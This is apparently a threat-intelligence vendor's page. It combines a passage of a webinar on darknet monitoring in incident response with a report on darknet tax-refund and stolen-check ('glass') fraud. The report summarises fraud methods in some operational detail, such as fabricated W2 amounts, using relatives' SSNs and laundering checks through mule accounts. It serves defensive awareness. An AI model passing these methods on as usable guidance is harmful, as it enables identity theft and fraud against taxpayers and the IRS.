And then, finally, once everything’s been contained, we feel comfortable that the organization can get back online, we prepare a report and present lessons learned. We also try to assemble any and all information that could have been leaked because that’s where regulation and compliance comes into play. So that’s essentially the incident response lifecycle and is one of Blackpanda’s areas of expertise.
Now onto DarkOwl.
Mark: Thank you, Mika. And as Mika mentioned, we are involved in both the frontend and the backend of the incident response cycle with Blackpanda. Just a bit about DarkOwl and what we do. Darkowl has built a platform that actively and continuously monitors the darknets, many darknets, and makes that data searchable by our clients. Among the darknets that we monitor are ToR, I2P, Zeronet, a range of other darknets. And I should say, that we call it the darknet, because in most of these forums and most of these darknets, user identity is obfuscated and traffic is encrypted. So, it’s a very difficult environment to monitor, and we have built a platform that does that across 25 to 30,000 darknet sites a day and it archives that data so that not only will you look and see what was happening today and on a continuous go forward basis, but you also have an archive to see what has happened in the past.You’ll see some of the some of the numbers of records that we have available in our database today.
Records available in DarkOwl database as of April, 2022
Just to talk a little bit about what is in the darknet, why is it important for both an incident response team and then more broadly. Among the types of data that are found in the darknet are very large quantities of personally identifiable information credentials, compromised accounts, malware, ransomware. There’s a lot of chatter among a variety of different forums between threat actors. There are lots of vendor and supply risk indicators as well. Most recently, in the context of the Ukraine Russia war, we are finding significant indicators of risk among vendors, supply chain vendors and supply chains that have presence in Ukraine, Belarus, and Russia. A lot of that chatter, a lot of those indicators show up in the darknet and in our platform. A lot of our platform is very intuitive to use. We can deliver data a number of ways what you’re looking at here is our vision platform search UI.
Screenshot of DarkOwl Vision UI platform
And actually, later in this webinar, I’ll do a quick tour. But you can see from looking at the top of this, it’s a very simple search bar. We can look for whatever you’re looking for in the darknet, at any given time. You can see there’s a search loaded on this slide for Conti, one of the threat actors out of Russia, and there are 52,000 results. We see 52,000 pages in the darknet at the time this search was run talking about Conti or mentioning Conti, or where Conti is participating in it in a forum. So, it’s a comprehensive platform to monitor the darknet and in the context of an incident response team, it can both alert you to a breach or to an incident and then it can provide you with the intelligence, as Mika said, to assess that breach and then really remediate it.
Mika: And I was just going to jump in exactly on that point. We’ve dealt with several Conti breaches, and once we see indicators that that might be the malware in use the threat actor in use, not only are we on the hard drive examining the forensic artifacts of the system to pull out what time they got in, what they’ve taken and basically any signs of lateral movement or their actions on objectives, we’re also coming over here and plugging in the exact threat actors names. They have handles, they have email addresses, they have IP addresses, so whatever we find in the environment, this search platform is kind of where we go to see what’s happening on the outside as opposed to just on the inside of the organization across the systems.
Mark: And connecting those dots is critical. If you don’t connect those dots, you’re only looking at one particular piece of relevant information. And we are delighted to be able to offer that level of intelligence to teams like your own.
Mika: Absolutely, and sometimes the crawl date will show a date that much precedes the actual incident. So, the event might have happened even before, and that also helps our forensics because it gives us pivot points in time so we might go back further to the first sign of chatter on a certain target.
Well, I guess this comes back around to how we work together. The reconnaissance phase is what we just mentioned, where a threat actor is mentioning a potential target, the threat actor has scoped out where they’re looking to go and what they’re looking to do, actions on objectives. During that reconnaissance phase, we might see chatter in the dark web. The cyber kill chain is a Lockheed Martin concept that helps explain the chronology of an attack. So, they’re scoping out the target, they’re preparing an exploit that could be used against a vulnerability at the organization, and then delivery exploitation installation is typically where the customer would pick up on the fact that something is happening. Command and Control is quite noisy and usually limited to just forensics and network analysis. But that’s where they are continuing to operate within the environment, using remote access to the organization. And, like we said, actions on objectives. This is where data is leaked or sold on the dark web. This is where they’re actually putting ransomware across systems and trying to extort the organization. All of this can either be incident response based, so in the event of an attack or a proactive service called compromise assessments, which is where we would continuously perform these darknet searches with DarkOwl and we would have software on the endpoints that allow us to perform advanced threat hunting. So, anything we’re seeing, like Mark said, there’s chatter and there’s also indicators across the internet of potential events that could be happening. We can sweep the environment and look for signs of that before something actually happens. So even though antivirus and anti-malware were just some percent of the time, there are advanced threats that don’t yet have signatures that nobody’s tracking yet across the board and these allow us this advanced threat hunting skills and darknet searches allow us to find signs of that much earlier.
We can jump into a case study a little bit before Mark demos. But essentially, Blackpanda had a great success tracing down data leaks following a case in Southeast Asia. We were tasked to discover, analyze, and report stolen or misappropriated data related to client domains or keywords. This essentially means they thought they might have been breached. They hadn’t yet signed on for a compromise assessment, which is basically like a sanity check. Is there something going on? My antivirus didn’t check, and they came to us with the suspicion that something had happened. Over the course of this project, partnering with DarkOwl, and performing very targeted searches for their keywords we then pivoted to compare how this attack was similar to another found threat actor groups and different sites in the deep web that held their records. After about two months, we had 13,500,000 records related to this one company. That allowed them to report and take precautions, and follow on measures to contain the attack and also try to remediate the damage of that data leak. It was very important for them to know the extent and just how much data was actually released. And then we walked them through how to actually patch and repair the systems that led to that attack. So, what happens? How do we find 13,000,000 sum records, Mark?
Mark: Well, that’s a that’s a very good question, and we’ll show you a couple of searches to show you how we do that. It is not unusual for sizable companies to have that level of exposure in the darknet. They are usually the result of multiple leaks, multiple breaches that have occurred over the years. The risk, by the way, to this company and to other companies is that a substantial portion or even a small portion of those records are still alive. So many people will remember the Colonial Pipeline breach that occurred last summer here in the United States, shut down a saline supply to a large portion of the east coast for about a week. It has been publicly reported that the way the hackers got into the Colonial Pipeline network was in fact, via a credential that had been formerly used by an intern that was available widely in the darknet. In other words, there was no phishing that occurred. They just went into the darknet, pulled down a credential, discovered that it was live and walked right into the network into the Colonial Pipeline network. That is one of the risks that occurs. That’s exactly where Blackpanda can add significant value to any client.
Mika: Excellent. So we’ve already been through this kind of wave as to how we could either proactively identify those leaked credentials after a compromised assessment and prevent a lot of these from happening. There’s also the incident response where we get indicators and intelligence that we need to enrich and also check externally whether there’s any additional signs. So these are just more kind of snapshots of how this could work proactively. But, you know, in our reporting, we’re very thorough, this is sort of inside the organization. We’ve deployed a certain endpoint detection and response tool where we’re looking for signs of malware, signs of threats. These are all technical threats that would only be available given a view into the organization. These are all the kinds the strains of malware and hash values that might be in a report. And again, signs of these things can also be thrown into DarkOwl, or a platform that helps us enrich that intelligence. So what else do we know about a file with this hash values of the hash that is the unique signature of a single piece of digital information? Whether it’s a single document or a giant binary file, everything can be hashed to a unique value. So these are great ways to leverage DarkOwl as well. Has anyone else been talking about or posting about malware by this name or with this hash value? Are these websites places that this backdoor Trojan might be still sitting? Has anyone else talked about these particular indicators of compromise? IOCs across the deep web. So these are just a few of the ways that we would really get into DarkOwl and use it not only during an investigation, but proactively as well.
Mark: One of the strengths of the DarkOwl platform is that any of these terms can be inserted in and searched for on the platform. It’s a search tool. It has a fundamental search capability. And as Mika said, we can then identify the threat actors who are discussing it, whether there are future targets, whether there was there were discussions in the past about targeting this particular client’s environment. It’s a wealth of information that opens up once you have the ability to search across the entire dark web for any of these terms or any of these hash values.
Mika: Absolutely, and that’s exactly how we enrich our intelligence and report on what really happened and what could be happening even outside the organization. With that again, DarkOwl traces and brings into their intelligence ecosystem a number of different breaches. So although this was particular to a certain client, you know, these breaches hold passwords of thousands and millions of users. They could be huge. They could be massive databases that are even sometimes an amalgamation of different breaches over time. So DarkOwl keeps us current on what else is happening. And with that, again, we’ve kind of been over the flow in a sense, but we extract indicators of compromise from the evidence we received by going through the forensic intake and triage process. Then we enrich across dark web intelligence sources and perform forensic analysis on the actual system itself. So getting timestamps, trying to bring it back to the root cause. So when did this happen? Why did this happen? And then our reporting can be very robust as a result of us having this level of intelligence. So I guess it’s time to see it in action.
Mark: Well, thank you. If you could let me share my screen, I will switch over. What you see in front of you is the landing page for DarkOwl Vision, our user interface. It’s quite intuitive. There’s a search bar and you can search for any term. As mentioned, they can be hash terms, they can be nicknames, they can be user handles, they can be combinations of all of the above. I’m going to do a quick search and I’m going to pick on AT&T for no good reason. I apologize if anyone from AT&T is going to see this. I’m going to do a search for AT&T .com, and I am going to search for any mentions of AT&T .com in the darknet, meaning any page that has a credential or mention of AT&T .com domain on it. And as you can see, there are almost half a million pages in our database in the darknet mentioning AT&T .com. The results are presented here. If you scroll down, you’ll notice that M.J. Matthews of AT&T .com has, as mentioned, a range of email addresses that are mentioned here, and the results are can be sorted and presented in a number of different ways. If I search, if I sought these results, these half million results by crawl date, for example, and there are a lot of results, so this will take a second. You’ll see that the most recent of these results was extracted from the darknet about an hour and a half ago. So this is a very recent result, and I can then sort them by relevance and hackishness, is a term we use to date to determine how dangerous those results are. So, for example, I won’t click on it, but down here, my guess is this is 100 percent hackishness because there’s a password associated with that particular domain. So it’s very intuitive, it’s very easy to use. As Mika mentioned, a team that is looking for a specific term or an actor in the darknet can very easily and very intuitively jump onto this platform and see what’s happening and then say, what were they doing most recently? And you can sort by crawl date. I want to show one other feature that is relevant to what Mika has been talking about, which is our dark and exposure scores. I can create a score for any domain, any domain in the world, and I’ve just randomly selected. You can see even there’s a dark score here if I click on this AT&T score. This is a score of how exposed AT&T, since I just did the search, is in the darknet and you’ll see the score changes and you’ll see as I move my cursor, the score changes in proportion to how much data is available in the darknet at any given point in time around AT&T. And I’ll take the example of BlackBerry here. BlackBerry on the 5th on the 14th of May of last year had a score just above 10, and overnight their score jumped to just under 14. That’s a massive jump in our scoring metric and in our scoring algorithm. And the reason is somebody released a bunch of data around BlackBerry. In fact, a terrific amount of data around BlackBerry. If you’re a user of the platform or a partner like Blackpanda, this is an indicator that something’s gone wrong. There has been a major compromise. We need to investigate this very quickly. So this provides a very quick back of the envelope way to monitor clients, to monitor your own environment, to see what’s going on and to compare how you are doing relative to, say, your competitors or other peoples, other people who are in your sector. The platform comes with a range of other ways that you could pass data, search data, and make use of data, including an alerting platform, so that if, for example, AT&T is a client or you are AT&T and you’re monitoring your own environment, you can be alerted by email to any critical elements that show up in the darknet at any given time. So that a very quick demo, Mika, and thank you for allowing me to do that. But you can see it’s a very intuitive platform. It has direct usage in the incident response phase, and we’re delighted, as I said earlier, to partner with Blackpanda.
Mika: I think that’s our last topic, just on that again, it’s been very powerful for us to be able to show again every, every organization that’s been hacked. It’s the worst day. It’s a terrible event. But in the event that we get those early indicators and we’re able to stop something before something even worse happens, you know, at the sign of chatter or proactively by finding initial indicators of an intrusion and correlate that with deep web intelligence and then stop this thing before it happens. It’s just a very powerful solution. So we’ve been thrilled to partner with DarkOwl. And if there are any questions after the webinar by all means, we’ll provide contact details in posting this this recording.
Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case. You can also reach out to Blackpanda here.
DarkOwl has evidence that criminals from the darknet are actively exploiting the American Treasury Department and its Internal Revenue Service (IRS). Many actors are advertising offers for ‘refund methods’ for sale in fraud communities across the darknet and adjacent chat platforms such as Telegram. Fraudsters have also detailed how to directly utilize tax preparation software such as TurboxTax to steal refunds for quick, but fraudulent financial gain.
Other underground fraud methods such as ‘glass checks,’ are increasingly popular. DarkOwl has observed several victims’ tax payment checks to the IRS and/or state revenue departments have been stolen and sold on the darknet for financial exploitation.
One of the primary financial economies of the darknet is fraud, and tax fraud is a booming sub-economy that is constantly evolving. Our analysts have provided the below as the result of our latest observations in regards to tax fraud on the darknet.
Fraud on the Darknet
The brokerage of corporate and private information is one aspect of fraud we see realized in leak after leak of corporations and consumers’ private information. However, the fraud industry is much larger than data alone. This ever-growing segment of the darknet encapsulates not only the carding industry and associated banking malware and exploit development, but also what we casually refer as the ‘get-rich-quick’ schemes that prey on loopholes in payment interfaces and programs.
During the pandemic, we observed an influx of new ‘get-rich-quick’ fraudsters entering the darknet -capitalizing on vulnerabilities in the US government subsidized funding programs for those financially impacted by COVID-19. We also witnessed programs such as the Small Business Administration (SBA)’s Paycheck Payment Program (PPP) and state-level Pandemic Unemployment Assistance (PUA) regularly mentioned across Telegram with regular ‘sauce’ offers and updates available. We detailed how some of these programs were exploited our in-depth report last year.
According to public media sources and recent academic reporting, it is estimated that the US paid out at least 10-15% of the $800 billion USD PPP in fraudulent payments. PUA fraud estimates are closer to $400 billion USD.
Many of the same fraudsters who buy, trade, and sell methods for pandemic-related financial fraud schemes, also advocate, and disseminate tax refund fraud methods in the underground.
Current Tax Fraud Mentions
Most of the fraud IRS methods on Telegram include offers for “fullz” for the IRS tax refund walk through method. “Fullz” is darknet community slang for ‘full information’ and usually includes an individual’s full name, social security number (SSN), date of birth, physical address, credit card number, and other key identification information to conduct identity theft.
According to DarkOwl Vision, the price of ‘fullz’ has decreased in recent years with US citizen ‘fullz’ readily available for less than $20 USD. More expensive ‘fullz’ will also include a copy of the victim’s driver’s license or falsified bank statements for additional identity verification.
In addition to individual ‘fullz’, some underground data brokers sell ‘access’ to drives and databases with significant volumes of PII. A couple of years ago, a RaidForums member using the moniker “fairbanksfires” advertised an offer to purchase access to stolen devices associated with an online tax filing company in the United States.
This cybercriminal could provide its buyer access to millions of US social security numbers, email addresses, passwords, and bank routing and account numbers for extensive tax fraud for years to come.
The most common ‘irs method’ and tax refund fraud method costs no more than $150 USD. Other personalized offers for IRS tax fraud includes not only the ‘fullz’, but supporting falsified self-employed business licenses, 1099 and W2 forms generated by the fraudster to supplement the IRS tax forms and increase potential for higher refund amounts. Most methods upon purchase detail how to perform an OSINT background search on the ‘fullz’ information provided to locate the employer of the fullz or their previous employer.
The web service FreeERISA is often mentioned which provides free access to registered users all form 5500s filed with the Department of Labor for most all companies across the United States, including tax identification numbers. Methods further detail how to estimate tax credits and beneficiary information to submit into the return to maximize the refund amount.
One user shared a video on a Telegram channel using this method that demonstrated a fraudulently filed Federal tax return with a refund amount more than $20,000 USD and the California State return was close to $3,500 USD.
Source: Telegram
Another fraudster’s IRS method advises the buyer to use known persons that have little to no credit history but will pass SSN validation checks in tax account software applications. They recommend using their own children’s, elderly parents’, grandparents’ or distant familial associations’ SSNs and identities for higher success of the tax fraud method.
IRS Method using Buyer’s Identity
This method is directly tied to the buyer’s identity and SSN and involves utilizing automated tax software like TurboTax and TaxAct to obtain a refund of upwards of $20,000 USD in combined federal and state funds. This method caveats up-front that this method will lead to the IRS eventually catching on and will force the buyer repay the amount refunded during this tax year. The purpose of this method is to give the buyer financial relief for an estimated two to six years before audit is highly likely.
Any W2 can be utilized for this method – or one can be obtained from the fraudster directly. The buyer does not actually have to be employed to use this method. The fraudster stated that the buyer may enter any amount in the Wages, Tips, and Compensation field of the W2, but the amount should not exceed $100,000 USD. The exact percentages for federal and state social security wages and tax withheld calculations are provided in the method as guidance for the buyer’s fraudulent W2 entries.
The fraudster suggested adding real life or ‘fullz’ dependents to increase the refund amount.
Source: Telegram
The fraudster was upfront that this method is only recommended for the worst-case buyer in extreme financial duress, e.g. has no money whatsoever, homeless, or unable to make ends meet and needs money quickly.
Competitive Fraudsters
Naturally, fraud vendors are incredibly competitive with each other and speak out against other popular fraud shops and declare that most methods are scams. DarkOwl noticed one user on Telegram berating the widely discussed ‘irs method’ avowing their method alone was the ‘real method’ and payments are readily available in 48 hours.
‘Glass Fraud’ Catches IRS Payments Mailed via USPS
A new fraud method involves the physical theft of mailed paper checks inside US Postal System (USPS). According to fraudsters, the method is commonly called ‘glass’ because “the checks always clear” and often requires an insider threat, e.g. cooperative postal workers who provide copies of the universal mailbox access keys or steal the mail directly and turn it over to the fraudsters for resale.
The fraudster sells the check to the buyer for some base price or percentage of the value of the check, usually via Bitcoin or similar cryptocurrency. The stolen checks are then digitally altered and deposited into mule-controlled bank drops that payout the specified amount of the check to the buyer via their preferred method of choice, such as: cash, Western Union, or CashApp. The buyer assumes the risk that the check will not go through, but because the victim is completely unaware their check has been stolen, it is most likely not yet cancelled. It is only until the payment is never received to the payee’s address, that they realize they are a victim of fraud.
Although this method does not directly target the IRS and tax refunds specifically, many of the stolen checks include tax payments submitted via physical checks via the US mail.
The screenshots of the ‘glass check’ examples below are two of dozens we found on a popular fraud Telegram channel. Many paper checks included payments to the IRS or the state revenue departments for thousands of dollars in value.
The sell value of the check is directly proportional to the value of the check itself with a $2,000+ tax payment check selling for more than twice as much as the $843 USD one. Some of the checks also included the signee’s social security number in the memo line which could be used for additional identity theft and fraud. We’ve intentionally obfuscated any identifying information for the checks we included here, but the dates and check payment amounts are clearly visible.
Sample Glass Checks for Sale on (Source: Telegram)
Curious about something you read about tax fraud or the darknet? Interested in learning more? Contact us to find out how darknet data applies to your use case.
DarkOwl is a Denver-based company that provides the world’s largest index of darknet content and the tools to efficiently find leaked or otherwise compromised sensitive data. We shorten the timeframe to detection of compromised data on the darknet, empowering organizations to swiftly detect security gaps and mitigate damage prior to misuse of their data.
